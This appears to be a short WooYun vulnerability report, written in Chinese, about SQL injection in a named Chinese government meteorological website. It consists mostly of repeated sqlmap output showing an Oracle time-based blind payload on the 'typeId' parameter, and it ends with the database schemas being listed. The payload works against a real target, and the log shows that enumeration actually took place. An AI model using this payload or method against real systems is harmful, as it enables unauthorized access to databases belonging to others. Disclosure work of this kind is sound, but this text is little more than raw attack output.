WooYun.org

注入url：http://cdc.cma.gov.cn/yhzn.do?method=getContent&typeId=25
直接sqlmap
sqlmap identified the following injection points with a total of 327 HTTP(s) requests:
---
Place: GET
Parameter: typeId
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: method=getContent&typeId=25 AND 1924=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(72)||CHR(82)||CHR(70),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: typeId
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: method=getContent&typeId=25 AND 1924=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(72)||CHR(82)||CHR(70),5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: typeId
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: method=getContent&typeId=25 AND 1924=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(72)||CHR(82)||CHR(70),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: typeId
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: method=getContent&typeId=25 AND 1924=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(72)||CHR(82)||CHR(70),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: typeId
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: method=getContent&typeId=25 AND 1924=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(72)||CHR(82)||CHR(70),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
[15:43:12] [INFO] fetching tables for databases: 'OUTLN, CTXSYS, DBSNMP, SDB_INSERT, SDB_META, SDB_MONITOR, SYS, SYSTEM, TSMSYS, XDB'
后面没有继续跑了。嘻嘻。我什么都不知道